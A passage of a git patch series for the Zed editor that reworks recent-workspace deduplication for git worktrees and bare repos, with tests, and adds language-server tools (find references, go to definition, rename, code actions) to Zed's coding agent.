test_recent_workspace_identity_deduplication(cx: &mut gpui::TestAppContext) { let fs = fs::FakeFs::new(cx.executor()); // Main repo with a linked worktree entry @@ -5012,64 +5177,59 @@ mod tests { let t3 = Utc::now() - chrono::Duration::hours(1); let workspaces = vec![ - // 1: Main checkout of /repo (opened earlier) - ( - WorkspaceId(1), - SerializedWorkspaceLocation::Local, - PathList::new(&["/repo"]), - t0, - ), - // 2: Linked worktree of /repo (opened more recently) - // Should dedup with #1; more recent timestamp wins. - ( + local_recent_workspace(WorkspaceId(1), PathList::new(&["/repo"]), t0, fs.as_ref()) + .await, + local_recent_workspace( WorkspaceId(2), - SerializedWorkspaceLocation::Local, PathList::new(&["/worktree"]), t1, - ), - // 3: Mixed-path workspace: one root is a linked worktree, - // the other is a normal repo. The worktree path should be - // resolved; the normal path kept as-is. - ( + fs.as_ref(), + ) + .await, + local_recent_workspace( WorkspaceId(3), - SerializedWorkspaceLocation::Local, PathList::new(&["/other-repo", "/worktree"]), t2, - ), - // 4: Non-git project — passed through unchanged. - ( + fs.as_ref(), + ) + .await, + local_recent_workspace( WorkspaceId(4), - SerializedWorkspaceLocation::Local, PathList::new(&["/plain-project"]), t3, - ), + fs.as_ref(), + ) + .await, ]; - let result = resolve_worktree_workspaces(workspaces, fs.as_ref()).await; + let result = dedupe_recent_workspaces(workspaces); // Should have 3 entries: #1 and #2 deduped into one, plus #3 and #4. assert_eq!(result.len(), 3); // First entry: /repo — deduplicated from #1 and #2. // Keeps the position of #1 (first seen), but with #2's later timestamp. - assert_eq!(result[0].2.paths(), &[PathBuf::from("/repo")]); - assert_eq!(result[0].3, t1); + assert_eq!(result[0].identity_paths.paths(), &[PathBuf::from("/repo")]); + assert_eq!(result[0].timestamp, t1); // Second entry: mixed-path workspace with worktree resolved. 
// /worktree → /repo, so paths become [/other-repo, /repo] (sorted). assert_eq!( - result[1].2.paths(), + result[1].identity_paths.paths(), &[PathBuf::from("/other-repo"), PathBuf::from("/repo")] ); - assert_eq!(result[1].0, WorkspaceId(3)); + assert_eq!(result[1].workspace_id, WorkspaceId(3)); // Third entry: non-git project, unchanged. - assert_eq!(result[2].2.paths(), &[PathBuf::from("/plain-project")]); - assert_eq!(result[2].0, WorkspaceId(4)); + assert_eq!( + result[2].identity_paths.paths(), + &[PathBuf::from("/plain-project")] + ); + assert_eq!(result[2].workspace_id, WorkspaceId(4)); } #[gpui::test] - async fn test_resolve_worktree_workspaces_bare_repo(cx: &mut gpui::TestAppContext) { + async fn test_recent_workspace_identity_for_bare_repo(cx: &mut gpui::TestAppContext) { let fs = fs::FakeFs::new(cx.executor()); // Bare repo at /foo/.bare (commondir doesn't end with .git) @@ -5098,19 +5258,315 @@ mod tests { let t0 = Utc::now(); - let workspaces = vec![( + let result = local_recent_workspace( WorkspaceId(1), - SerializedWorkspaceLocation::Local, PathList::new(&["/foo/my-feature"]), t0, - )]; + fs.as_ref(), + ) + .await; + + // Bare-backed worktrees should resolve to the repo identity path, which + // is the parent directory users think of as the project root. 
+ assert_eq!(result.identity_paths.paths(), &[PathBuf::from("/foo")]); + } + + #[gpui::test] + async fn test_recent_workspace_identity_deduplicates_main_and_linked_worktree( + cx: &mut gpui::TestAppContext, + ) { + let fs = fs::FakeFs::new(cx.executor()); + + fs.insert_tree( + "/the-project", + json!({ + ".git": "gitdir: ./.bare\n", + ".bare": { + "worktrees": { + "feature-a": { + "commondir": "../../", + "HEAD": "ref: refs/heads/feature-a" + } + } + }, + "src": { "main.rs": "" } + }), + ) + .await; + + fs.insert_tree( + "/the-project/feature-a", + json!({ + ".git": "gitdir: ../.bare/worktrees/feature-a\n", + "src": { "lib.rs": "" } + }), + ) + .await; - let result = resolve_worktree_workspaces(workspaces, fs.as_ref()).await; + let t0 = Utc::now() - chrono::Duration::hours(1); + let t1 = Utc::now(); + let workspaces = vec![ + local_recent_workspace( + WorkspaceId(1), + PathList::new(&["/the-project"]), + t0, + fs.as_ref(), + ) + .await, + local_recent_workspace( + WorkspaceId(2), + PathList::new(&["/the-project/feature-a"]), + t1, + fs.as_ref(), + ) + .await, + ]; + + let result = dedupe_recent_workspaces(workspaces); - // The worktree path must be preserved unchanged — /foo/.bare is a bare repo - // and cannot serve as a working-tree root, so resolution must return None. 
assert_eq!(result.len(), 1); - assert_eq!(result[0].2.paths(), &[PathBuf::from("/foo/my-feature")]); + assert_eq!( + result[0].identity_paths.paths(), + &[PathBuf::from("/the-project")] + ); + assert_eq!(result[0].workspace_id, WorkspaceId(2)); + assert_eq!(result[0].timestamp, t1); + } + + #[gpui::test] + async fn test_recent_project_workspaces_preserve_reopen_paths(cx: &mut gpui::TestAppContext) { + let fs = fs::FakeFs::new(cx.executor()); + let db = + WorkspaceDb::open_test_db("test_recent_project_workspaces_preserve_reopen_paths").await; + + fs.insert_tree( + "/the-project", + json!({ + ".git": "gitdir: ./.bare\n", + ".bare": { + "worktrees": { + "feature-a": { + "commondir": "../../", + "HEAD": "ref: refs/heads/feature-a" + } + } + }, + "src": { "main.rs": "" } + }), + ) + .await; + + fs.insert_tree( + "/the-project/feature-a", + json!({ + ".git": "gitdir: ../.bare/worktrees/feature-a\n", + "src": { "lib.rs": "" } + }), + ) + .await; + + db.save_workspace(workspace_with( + 1, + &[Path::new("/the-project")], + empty_pane_group(), + None, + )) + .await; + db.save_workspace(workspace_with( + 2, + &[Path::new("/the-project/feature-a")], + empty_pane_group(), + None, + )) + .await; + db.set_timestamp_for_tests(WorkspaceId(1), "2024-01-01 00:00:00".to_owned()) + .await + .unwrap(); + db.set_timestamp_for_tests(WorkspaceId(2), "2024-01-01 00:00:01".to_owned()) + .await + .unwrap(); + + let recents = db.recent_project_workspaces(fs.as_ref()).await.unwrap(); + + assert_eq!(recents.len(), 1); + assert_eq!(recents[0].workspace_id, WorkspaceId(2)); + assert_eq!( + recents[0].paths.paths(), + &[PathBuf::from("/the-project/feature-a")] + ); + assert_eq!( + recents[0].identity_paths.paths(), + &[PathBuf::from("/the-project")] + ); + } + + #[gpui::test] + async fn test_recent_project_workspaces_remote_identity_hint(cx: &mut gpui::TestAppContext) { + let fs = fs::FakeFs::new(cx.executor()); + let db = + 
WorkspaceDb::open_test_db("test_recent_project_workspaces_remote_identity_hint").await; + + let workspace = remote_workspace_with(1, "example.com", &[Path::new("/repo/feature-a")]); + db.save_workspace(SerializedWorkspace { + identity_paths: Some(PathList::new(&["/repo"])), + ..workspace + }) + .await; + + let recents = db.recent_project_workspaces(fs.as_ref()).await.unwrap(); + + assert_eq!(recents.len(), 1); + assert_eq!( + recents[0].paths.paths(), + &[PathBuf::from("/repo/feature-a")] + ); + assert_eq!(recents[0].identity_paths.paths(), &[PathBuf::from("/repo")]); + } + + #[gpui::test] + async fn test_recent_project_workspaces_remote_paths_do_not_use_local_fs_identity( + cx: &mut gpui::TestAppContext, + ) { + let fs = fs::FakeFs::new(cx.executor()); + let db = WorkspaceDb::open_test_db( + "test_recent_project_workspaces_remote_paths_do_not_use_local_fs_identity", + ) + .await; + + fs.insert_tree( + "/repo", + json!({ + ".git": "gitdir: ./.bare\n", + ".bare": { + "worktrees": { + "feature-a": { + "commondir": "../../", + "HEAD": "ref: refs/heads/feature-a" + } + } + }, + "src": { "main.rs": "" } + }), + ) + .await; + fs.insert_tree( + "/repo/feature-a", + json!({ + ".git": "gitdir: ../.bare/worktrees/feature-a\n", + "src": { "lib.rs": "" } + }), + ) + .await; + + db.save_workspace(remote_workspace_with( + 1, + "example.com", + &[Path::new("/repo/feature-a")], + )) + .await; + + let recents = db.recent_project_workspaces(fs.as_ref()).await.unwrap(); + + assert_eq!(recents.len(), 1); + assert_eq!( + recents[0].identity_paths.paths(), + &[PathBuf::from("/repo/feature-a")] + ); + } + + #[gpui::test] + async fn test_recent_project_workspaces_do_not_dedupe_remote_hosts( + cx: &mut gpui::TestAppContext, + ) { + let fs = fs::FakeFs::new(cx.executor()); + let db = + WorkspaceDb::open_test_db("test_recent_project_workspaces_do_not_dedupe_remote_hosts") + .await; + + db.save_workspace(remote_workspace_with(1, "host-a", &[Path::new("/repo")])) + .await; + 
db.save_workspace(remote_workspace_with(2, "host-b", &[Path::new("/repo")])) + .await; + db.set_timestamp_for_tests(WorkspaceId(1), "2024-01-01 00:00:00".to_owned()) + .await + .unwrap(); + db.set_timestamp_for_tests(WorkspaceId(2), "2024-01-01 00:00:01".to_owned()) + .await + .unwrap(); + + let recents = db.recent_project_workspaces(fs.as_ref()).await.unwrap(); + + assert_eq!(recents.len(), 2); + assert_eq!(recents[0].workspace_id, WorkspaceId(2)); + assert_eq!(recents[1].workspace_id, WorkspaceId(1)); + } + + #[gpui::test] + async fn test_delete_recent_workspace_group_removes_all_matching_rows( + cx: &mut gpui::TestAppContext, + ) { + let fs = fs::FakeFs::new(cx.executor()); + let db = WorkspaceDb::open_test_db( + "test_delete_recent_workspace_group_removes_all_matching_rows", + ) + .await; + + fs.insert_tree( + "/the-group", + json!({ + ".git": "gitdir: ./.bare\n", + ".bare": { + "worktrees": { + "feature-a": { + "commondir": "../../", + "HEAD": "ref: refs/heads/feature-a" + } + } + }, + "src": { "main.rs": "" } + }), + ) + .await; + + fs.insert_tree( + "/the-group/feature-a", + json!({ + ".git": "gitdir: ../.bare/worktrees/feature-a\n", + "src": { "lib.rs": "" } + }), + ) + .await; + + db.save_workspace(SerializedWorkspace { + identity_paths: Some(PathList::new(&["/the-group"])), + ..workspace_with(1, &[Path::new("/the-group")], empty_pane_group(), None) + }) + .await; + db.save_workspace(SerializedWorkspace { + identity_paths: Some(PathList::new(&["/the-group"])), + ..workspace_with( + 2, + &[Path::new("/the-group/feature-a")], + empty_pane_group(), + None, + ) + }) + .await; + db.set_timestamp_for_tests(WorkspaceId(1), "2024-01-01 00:00:00".to_owned()) + .await + .unwrap(); + db.set_timestamp_for_tests(WorkspaceId(2), "2024-01-01 00:00:01".to_owned()) + .await + .unwrap(); + + let recents = db.recent_project_workspaces(fs.as_ref()).await.unwrap(); + assert_eq!(recents.len(), 1); + + let deleted = db.delete_recent_workspace_group(&recents[0]).await.unwrap(); + 
assert_eq!(deleted, vec![WorkspaceId(2), WorkspaceId(1)]); + + let recents = db.recent_project_workspaces(fs.as_ref()).await.unwrap(); + assert!(recents.is_empty()); } #[gpui::test] diff --git a/crates/workspace/src/persistence/model.rs b/crates/workspace/src/persistence/model.rs index f0f14cdb591053..33a05fe63562bd 100644 --- a/crates/workspace/src/persistence/model.rs +++ b/crates/workspace/src/persistence/model.rs @@ -130,6 +130,13 @@ pub(crate) struct SerializedWorkspace { pub(crate) id: WorkspaceId, pub(crate) location: SerializedWorkspaceLocation, pub(crate) paths: PathList, + /// The workspace's main worktree paths at the time this workspace was saved. + /// + /// These paths are used for grouping, deduping, and display in recent-workspace + /// UIs. They are not authoritative for reopening the workspace, because they may + /// become stale if the repository layout changes after the save. Use `paths` when + /// reopening the workspace. + pub(crate) identity_paths: Option, pub(crate) center_group: SerializedPaneGroup, pub(crate) window_bounds: Option, pub(crate) centered_layout: bool, diff --git a/crates/workspace/src/welcome.rs b/crates/workspace/src/welcome.rs index de189d89c9a219..4110cffc46d811 100644 --- a/crates/workspace/src/welcome.rs +++ b/crates/workspace/src/welcome.rs @@ -1,11 +1,10 @@ use crate::{ - NewFile, Open, OpenMode, PathList, SerializedWorkspaceLocation, ToggleWorkspaceSidebar, - Workspace, WorkspaceId, + NewFile, Open, OpenMode, PathList, RecentWorkspace, SerializedWorkspaceLocation, + ToggleWorkspaceSidebar, Workspace, item::{Item, ItemEvent}, persistence::WorkspaceDb, }; use agent_settings::AgentSettings; -use chrono::{DateTime, Utc}; use git::Clone as GitClone; use gpui::{ Action, App, Context, Entity, EventEmitter, FocusHandle, Focusable, InteractiveElement, @@ -242,14 +241,7 @@ pub struct WelcomePage { workspace: WeakEntity, focus_handle: FocusHandle, fallback_to_recent_projects: bool, - recent_workspaces: Option< - Vec<( - 
WorkspaceId, - SerializedWorkspaceLocation, - PathList, - DateTime, - )>, - >, + recent_workspaces: Option>, } impl WelcomePage { @@ -310,14 +302,11 @@ impl WelcomePage { cx: &mut Context, ) { if let Some(recent_workspaces) = &self.recent_workspaces { - if let Some((_workspace_id, location, paths, _timestamp)) = - recent_workspaces.get(action.index) - { - let is_local = matches!(location, SerializedWorkspaceLocation::Local); + if let Some(workspace) = recent_workspaces.get(action.index) { + let is_local = matches!(workspace.location, SerializedWorkspaceLocation::Local); if is_local { - let paths = paths.clone(); - let paths = paths.paths().to_vec(); + let paths = workspace.paths.paths().to_vec(); self.workspace .update(cx, |workspace, cx| { workspace @@ -433,8 +422,13 @@ impl Render for WelcomePage { .flatten() .take(5) .enumerate() - .map(|(index, (_, loc, paths, _))| { - self.render_recent_project(index, first_section_entries + index, loc, paths) + .map(|(index, workspace)| { + self.render_recent_project( + index, + first_section_entries + index, + &workspace.location, + &workspace.identity_paths, + ) }) .collect::>(); diff --git a/crates/workspace/src/workspace.rs b/crates/workspace/src/workspace.rs index 45a14fa1a04b97..03b01cc79d81ad 100644 --- a/crates/workspace/src/workspace.rs +++ b/crates/workspace/src/workspace.rs @@ -84,15 +84,15 @@ pub use pane_group::{ ActivePaneDecorator, HANDLE_HITBOX_SIZE, Member, PaneAxis, PaneGroup, PaneRenderContext, SplitDirection, }; -use persistence::{SerializedWindowBounds, model::SerializedWorkspace}; pub use persistence::{ - WorkspaceDb, delete_unloaded_items, + RecentWorkspace, WorkspaceDb, delete_unloaded_items, model::{ DockData, DockStructure, ItemId, MultiWorkspaceState, SerializedMultiWorkspace, SerializedProjectGroup, SerializedWorkspaceLocation, SessionWorkspace, }, - read_serialized_multi_workspaces, resolve_worktree_workspaces, + read_serialized_multi_workspaces, }; +use persistence::{SerializedWindowBounds, 
model::SerializedWorkspace}; use postage::stream::Stream; use project::{ DirectoryLister, Project, ProjectEntryId, ProjectPath, ResolvedPath, Worktree, WorktreeId, @@ -6857,11 +6857,13 @@ impl Workspace { let center_group = build_serialized_pane_group(&self.center.root, window, cx); let docks = build_serialized_docks(self, window, cx); let window_bounds = Some(SerializedWindowBounds(window.window_bounds())); + let identity_paths_hint = self.project_group_key(cx).path_list().clone(); let serialized_workspace = SerializedWorkspace { id: database_id, location, paths, + identity_paths: Some(identity_paths_hint), center_group, window_bounds, display: Default::default(), @@ -8947,7 +8949,7 @@ pub async fn last_opened_workspace_location( .await .log_err() .flatten() - .map(|(id, location, paths, _timestamp)| (id, location, paths)) + .map(|workspace| (workspace.workspace_id, workspace.location, workspace.paths)) } pub async fn last_session_workspace_locations( @@ -9068,7 +9070,7 @@ pub async fn apply_restored_multiworkspace_state( && let Some(common_dir) = project::discover_root_repo_common_dir(path, fs.as_ref()).await { - let main_path = common_dir.parent().unwrap_or(&common_dir); + let main_path = project::repo_identity_path(&common_dir); resolved_paths.push(main_path.to_path_buf()); } else { resolved_paths.push(path.to_path_buf()); From 3b7917ede76640773f1e6612485acb088ca4f11e Mon Sep 17 00:00:00 2001 From: Cameron Mcloughlin Date: Tue, 5 May 2026 10:35:08 +0100 Subject: [PATCH 186/231] agent: LSP tools (#55744) Adds 4 (technically 5) new tools to the zed agent, corresponding to LSP actions: - `find_references` - `goto_definition` - `rename_symbol` - `get_code_actions` and `apply_code_actions` Notes: - `rename_symbol` skips doing a `prepare_rename`. If there is nothing to rename at the position, it will forward the error to the agent - The code action tools are stateful. The state is stored in the `get_code_actions` tool itself as a `PendingCodeActions`. 
It is not passed into/out of subagents. Calling `apply_code_actions` without calling `get_code_actions` first is an error, but I've never seen an agent do this Symbols are identified by: - file name - line number - symbol If there is no substring match on that line for the symbol text, it is an error. If there are multiple, it chooses the first. This may not be great if you have a line like: `fn convert(x: foo::Something) -> bar::Something` - the second `Something` is a different symbol, but is inaccessible to these tools. Probably fine for now, but we can look into improving Release Notes: - Added: New tools for the Zed Agent for interacting with language servers --------- Co-authored-by: Lukas Wirth --- assets/settings/default.json | 10 +- crates/agent/src/thread.rs | 26 +- crates/agent/src/tools.rs | 17 ++ .../agent/src/tools/apply_code_action_tool.rs | 145 +++++++++++ .../agent/src/tools/find_references_tool.rs | 104 ++++++++ .../agent/src/tools/get_code_actions_tool.rs | 119 +++++++++ .../agent/src/tools/go_to_definition_tool.rs | 113 +++++++++ crates/agent/src/tools/rename_tool.rs | 121 +++++++++ crates/agent/src/tools/symbol_locator.rs | 239 ++++++++++++++++++ crates/feature_flags/src/flags.rs | 12 + crates/gpui/src/test.rs | 10 +- .../src/pages/tool_permissions_setup.rs | 5 + 12 files changed, 912 insertions(+), 9 deletions(-) create mode 100644 crates/agent/src/tools/apply_code_action_tool.rs create mode 100644 crates/agent/src/tools/find_references_tool.rs create mode 100644 crates/agent/src/tools/get_code_actions_tool.rs create mode 100644 crates/agent/src/tools/go_to_definition_tool.rs create mode 100644 crates/agent/src/tools/rename_tool.rs create mode 100644 crates/agent/src/tools/symbol_locator.rs diff --git a/assets/settings/default.json b/assets/settings/default.json index cd2e164dfb0de5..624dcc0f01233a 100644 --- a/assets/settings/default.json +++ b/assets/settings/default.json @@ -1108,13 +1108,18 @@ "create_directory": true, "delete_path": true, 
"diagnostics": true, + "apply_code_action": true, "edit_file": true, "fetch": true, + "find_path": true, + "find_references": true, + "get_code_actions": true, + "go_to_definition": true, "list_directory": true, "project_notifications": false, "move_path": true, "now": true, - "find_path": true, + "rename_symbol": true, "read_file": true, "restore_file_from_disk": true, "save_file": true, @@ -1138,6 +1143,9 @@ "project_notifications": false, "now": true, "find_path": true, + "find_references": true, + "get_code_actions": true, + "go_to_definition": true, "read_file": true, "open": true, "grep": true, diff --git a/crates/agent/src/thread.rs b/crates/agent/src/thread.rs index 308bc843b1a4f5..c6979391673ec6 100644 --- a/crates/agent/src/thread.rs +++ b/crates/agent/src/thread.rs @@ -1,14 +1,15 @@ use crate::{ - ContextServerRegistry, CopyPathTool, CreateDirectoryTool, DbLanguageModel, DbThread, - DeletePathTool, DiagnosticsTool, EditFileTool, FetchTool, FindPathTool, GrepTool, - ListDirectoryTool, MovePathTool, NowTool, OpenTool, ProjectSnapshot, ReadFileTool, + ApplyCodeActionTool, CodeActionStore, ContextServerRegistry, CopyPathTool, CreateDirectoryTool, + DbLanguageModel, DbThread, DeletePathTool, DiagnosticsTool, EditFileTool, FetchTool, + FindPathTool, FindReferencesTool, GetCodeActionsTool, GoToDefinitionTool, GrepTool, + ListDirectoryTool, MovePathTool, NowTool, OpenTool, ProjectSnapshot, ReadFileTool, RenameTool, RestoreFileFromDiskTool, SaveFileTool, SpawnAgentTool, SystemPromptTemplate, Template, Templates, TerminalTool, ToolPermissionDecision, UpdatePlanTool, WebSearchTool, decide_permission_from_settings, }; use acp_thread::{MentionUri, UserMessageId}; use action_log::ActionLog; -use feature_flags::{FeatureFlagAppExt as _, UpdatePlanToolFeatureFlag}; +use feature_flags::{FeatureFlagAppExt as _, LspToolFeatureFlag, UpdatePlanToolFeatureFlag}; use agent_client_protocol::schema as acp; use agent_settings::{ @@ -1542,7 +1543,6 @@ impl Thread { 
self.project.clone(), self.action_log.clone(), )); - self.add_tool(DiagnosticsTool::new(self.project.clone())); self.add_tool(EditFileTool::new( self.project.clone(), cx.weak_entity(), @@ -1569,6 +1569,22 @@ impl Thread { self.add_tool(TerminalTool::new(self.project.clone(), environment.clone())); self.add_tool(WebSearchTool); + self.add_tool(DiagnosticsTool::new(self.project.clone())); + if cx.has_flag::() { + let code_action_store: CodeActionStore = cx.new(|_cx| None); + self.add_tool(FindReferencesTool::new(self.project.clone())); + self.add_tool(GetCodeActionsTool::new( + self.project.clone(), + code_action_store.clone(), + )); + self.add_tool(ApplyCodeActionTool::new( + self.project.clone(), + code_action_store, + )); + self.add_tool(GoToDefinitionTool::new(self.project.clone())); + self.add_tool(RenameTool::new(self.project.clone())); + } + if self.depth() < MAX_SUBAGENT_DEPTH { self.add_tool(SpawnAgentTool::new(environment)); } diff --git a/crates/agent/src/tools.rs b/crates/agent/src/tools.rs index b9db30ce432c28..e629f41e6d5d77 100644 --- a/crates/agent/src/tools.rs +++ b/crates/agent/src/tools.rs @@ -1,3 +1,4 @@ +mod apply_code_action_tool; mod context_server_registry; mod copy_path_tool; mod create_directory_tool; @@ -8,15 +9,20 @@ mod edit_file_tool; mod evals; mod fetch_tool; mod find_path_tool; +mod find_references_tool; +mod get_code_actions_tool; +mod go_to_definition_tool; mod grep_tool; mod list_directory_tool; mod move_path_tool; mod now_tool; mod open_tool; mod read_file_tool; +mod rename_tool; mod restore_file_from_disk_tool; mod save_file_tool; mod spawn_agent_tool; +mod symbol_locator; mod terminal_tool; mod tool_permissions; mod update_plan_tool; @@ -25,6 +31,7 @@ mod web_search_tool; use crate::AgentTool; use language_model::{LanguageModelRequestTool, LanguageModelToolSchemaFormat}; +pub use apply_code_action_tool::*; pub use context_server_registry::*; pub use copy_path_tool::*; pub use create_directory_tool::*; @@ -33,15 +40,20 @@ pub use 
diagnostics_tool::*; pub use edit_file_tool::*; pub use fetch_tool::*; pub use find_path_tool::*; +pub use find_references_tool::*; +pub use get_code_actions_tool::*; +pub use go_to_definition_tool::*; pub use grep_tool::*; pub use list_directory_tool::*; pub use move_path_tool::*; pub use now_tool::*; pub use open_tool::*; pub use read_file_tool::*; +pub use rename_tool::*; pub use restore_file_from_disk_tool::*; pub use save_file_tool::*; pub use spawn_agent_tool::*; +pub use symbol_locator::*; pub use terminal_tool::*; pub use tool_permissions::*; pub use update_plan_tool::*; @@ -116,6 +128,7 @@ macro_rules! tools { } tools! { + ApplyCodeActionTool, CopyPathTool, CreateDirectoryTool, DeletePathTool, @@ -123,12 +136,16 @@ tools! { EditFileTool, FetchTool, FindPathTool, + FindReferencesTool, + GetCodeActionsTool, + GoToDefinitionTool, GrepTool, ListDirectoryTool, MovePathTool, NowTool, OpenTool, ReadFileTool, + RenameTool, RestoreFileFromDiskTool, SaveFileTool, SpawnAgentTool, diff --git a/crates/agent/src/tools/apply_code_action_tool.rs b/crates/agent/src/tools/apply_code_action_tool.rs new file mode 100644 index 00000000000000..409546d89d0ba6 --- /dev/null +++ b/crates/agent/src/tools/apply_code_action_tool.rs @@ -0,0 +1,145 @@ +use std::fmt::Write; +use std::sync::Arc; + +use agent_client_protocol::schema as acp; +use gpui::{App, Entity, SharedString, Task}; +use project::Project; +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; + +use super::symbol_locator::CodeActionStore; +use crate::{AgentTool, ToolCallEventStream, ToolInput}; + +/// Applies a code action previously retrieved by get_code_actions. +/// +/// You must call get_code_actions first to get the list of available actions, +/// then use the number from that list to choose which action to apply. +/// +/// After applying a code action, the list is cleared. If you want to apply +/// another action, call get_code_actions again. 
+#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] +pub struct ApplyCodeActionToolInput { + /// The 1-based index of the code action to apply, from the list + /// returned by get_code_actions. + pub index: u32, +} + +pub struct ApplyCodeActionTool { + project: Entity, + code_action_store: CodeActionStore, +} + +impl ApplyCodeActionTool { + pub fn new(project: Entity, code_action_store: CodeActionStore) -> Self { + Self { + project, + code_action_store, + } + } +} + +impl AgentTool for ApplyCodeActionTool { + type Input = ApplyCodeActionToolInput; + type Output = String; + + const NAME: &'static str = "apply_code_action"; + + fn kind() -> acp::ToolKind { + acp::ToolKind::Other + } + + fn initial_title( + &self, + input: Result, + cx: &mut App, + ) -> SharedString { + if let Ok(input) = input { + let title = self + .code_action_store + .read(cx) + .as_ref() + .and_then(|pending| { + let index = input.index.checked_sub(1)? as usize; + Some(pending.actions.get(index)?.lsp_action.title().to_string()) + }); + if let Some(title) = title { + format!("Apply code action: {title}").into() + } else { + format!("Apply code action #{}", input.index).into() + } + } else { + "Apply code action".into() + } + } + + fn run( + self: Arc, + input: ToolInput, + _event_stream: ToolCallEventStream, + cx: &mut App, + ) -> Task> { + let project = self.project.clone(); + let store = self.code_action_store.clone(); + cx.spawn(async move |cx| { + let input = input + .recv() + .await + .map_err(|e| format!("Failed to receive tool input: {e}"))?; + + let pending = store.update(cx, |store, _cx| store.take()).ok_or_else(|| { + "No code actions available. Call get_code_actions first.".to_string() + })?; + + let zero_based_index = input + .index + .checked_sub(1) + .ok_or_else(|| "Index must be 1 or greater.".to_string())?; + + let action = pending + .actions + .get(zero_based_index as usize) + .cloned() + .ok_or_else(|| { + format!( + "Index {} is out of range. 
There were {} code action(s) available.", + input.index, + pending.actions.len() + ) + })?; + + let title = action.lsp_action.title().to_string(); + let buffer = pending.buffer.clone(); + + let apply_task = project.update(cx, |project, cx| { + project.apply_code_action(buffer, action, true, cx) + }); + + let transaction = apply_task + .await + .map_err(|e| format!("Failed to apply code action '{title}': {e}"))?; + + if transaction.0.is_empty() { + return Ok(format!( + "Code action '{title}' was applied but made no changes.", + )); + } + + let mut output = format!( + "Applied code action '{title}'. Modified {} file(s):\n", + transaction.0.len() + ); + + for (buffer, _) in &transaction.0 { + buffer.read_with(cx, |buffer, cx| { + let path = buffer + .file() + .map(|f| f.full_path(cx).display().to_string()) + .unwrap_or_else(|| "".to_string()); + writeln!(output, "- {path}").ok(); + }); + } + + Ok(output) + }) + } +} diff --git a/crates/agent/src/tools/find_references_tool.rs b/crates/agent/src/tools/find_references_tool.rs new file mode 100644 index 00000000000000..f829e150464d06 --- /dev/null +++ b/crates/agent/src/tools/find_references_tool.rs @@ -0,0 +1,104 @@ +use std::fmt::Write; +use std::sync::Arc; + +use super::symbol_locator::{LocationDisplay, SymbolLocator}; +use crate::{AgentTool, ToolCallEventStream, ToolInput}; +use agent_client_protocol::schema as acp; +use gpui::{App, Entity, SharedString, Task}; +use project::Project; +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; + +/// Finds all references to a symbol across the project using the language server. +/// +/// Returns a list of locations where the symbol is referenced, including file paths, +/// line numbers, and code snippets for each reference. +/// +/// Before using this tool, use read_file or grep to find the exact symbol +/// name and line number. 
+#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] +pub struct FindReferencesToolInput { + /// The symbol to find references of. + pub symbol: SymbolLocator, +} + +pub struct FindReferencesTool { + project: Entity, +} + +impl FindReferencesTool { + pub fn new(project: Entity) -> Self { + Self { project } + } +} + +impl AgentTool for FindReferencesTool { + type Input = FindReferencesToolInput; + type Output = String; + + const NAME: &'static str = "find_references"; + + fn kind() -> acp::ToolKind { + acp::ToolKind::Search + } + + fn initial_title( + &self, + input: Result, + _cx: &mut App, + ) -> SharedString { + if let Ok(input) = input { + format!("Find references to `{}`", input.symbol.symbol_name).into() + } else { + "Find references".into() + } + } + + fn run( + self: Arc, + input: ToolInput, + _event_stream: ToolCallEventStream, + cx: &mut App, + ) -> Task> { + let project = self.project.clone(); + cx.spawn(async move |cx| { + let input = input + .recv() + .await + .map_err(|e| format!("Failed to receive tool input: {e}"))?; + + let resolved = input.symbol.resolve(&project, cx).await?; + + let references_task = project.update(cx, |project, cx| { + project.references(&resolved.buffer, resolved.position, cx) + }); + + let references = references_task + .await + .map_err(|e| format!("Find references failed: {e}"))? 
+ .unwrap_or_default(); + + if references.is_empty() { + return Ok(format!( + "No references found for '{}'.", + input.symbol.symbol_name + )); + } + + let mut output = format!( + "Found {} references to `{}`:\n", + references.len(), + input.symbol.symbol_name + ); + + for location in &references { + let display = location + .buffer + .read_with(cx, |_, cx| LocationDisplay::from_location(location, cx)); + write!(output, "\n## {display}\n").ok(); + } + + Ok(output) + }) + } +} diff --git a/crates/agent/src/tools/get_code_actions_tool.rs b/crates/agent/src/tools/get_code_actions_tool.rs new file mode 100644 index 00000000000000..7f4fc81ec3f13b --- /dev/null +++ b/crates/agent/src/tools/get_code_actions_tool.rs @@ -0,0 +1,119 @@ +use std::fmt::Write; +use std::sync::Arc; + +use agent_client_protocol::schema as acp; +use gpui::{App, Entity, SharedString, Task}; +use project::Project; +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; + +use super::symbol_locator::{CodeActionStore, PendingCodeActions, SymbolLocator}; +use crate::{AgentTool, ToolCallEventStream, ToolInput}; + +/// Gets the list of available code actions at a symbol location from the language server. +/// +/// Code actions include quick fixes, refactorings, and other automated transformations +/// suggested by the language server (e.g. "Add missing import", "Extract to function"). +/// +/// Returns a numbered list of available actions. Use apply_code_action with the +/// corresponding number to apply one. +/// +/// Before using this tool, use read_file or grep to find the exact symbol +/// name and line number. +#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] +pub struct GetCodeActionsToolInput { + /// The symbol to get code actions for. 
+ pub symbol: SymbolLocator, +} + +pub struct GetCodeActionsTool { + project: Entity, + code_action_store: CodeActionStore, +} + +impl GetCodeActionsTool { + pub fn new(project: Entity, code_action_store: CodeActionStore) -> Self { + Self { + project, + code_action_store, + } + } +} + +impl AgentTool for GetCodeActionsTool { + type Input = GetCodeActionsToolInput; + type Output = String; + + const NAME: &'static str = "get_code_actions"; + + fn kind() -> acp::ToolKind { + acp::ToolKind::Search + } + + fn initial_title( + &self, + input: Result, + _cx: &mut App, + ) -> SharedString { + if let Ok(input) = input { + format!("Get code actions for `{}`", input.symbol.symbol_name).into() + } else { + "Get code actions".into() + } + } + + fn run( + self: Arc, + input: ToolInput, + _event_stream: ToolCallEventStream, + cx: &mut App, + ) -> Task> { + let project = self.project.clone(); + let store = self.code_action_store.clone(); + cx.spawn(async move |cx| { + let input = input + .recv() + .await + .map_err(|e| format!("Failed to receive tool input: {e}"))?; + + let resolved = input.symbol.resolve(&project, cx).await?; + + let actions_task = project.update(cx, |project, cx| { + let range = resolved.position..resolved.position; + project.code_actions(&resolved.buffer, range, None, cx) + }); + + let actions = actions_task + .await + .map_err(|e| format!("Failed to get code actions: {e}"))? + .unwrap_or_default(); + + if actions.is_empty() { + store.update(cx, |store, _cx| *store = None); + return Ok(format!( + "No code actions available for '{}' at this location.", + 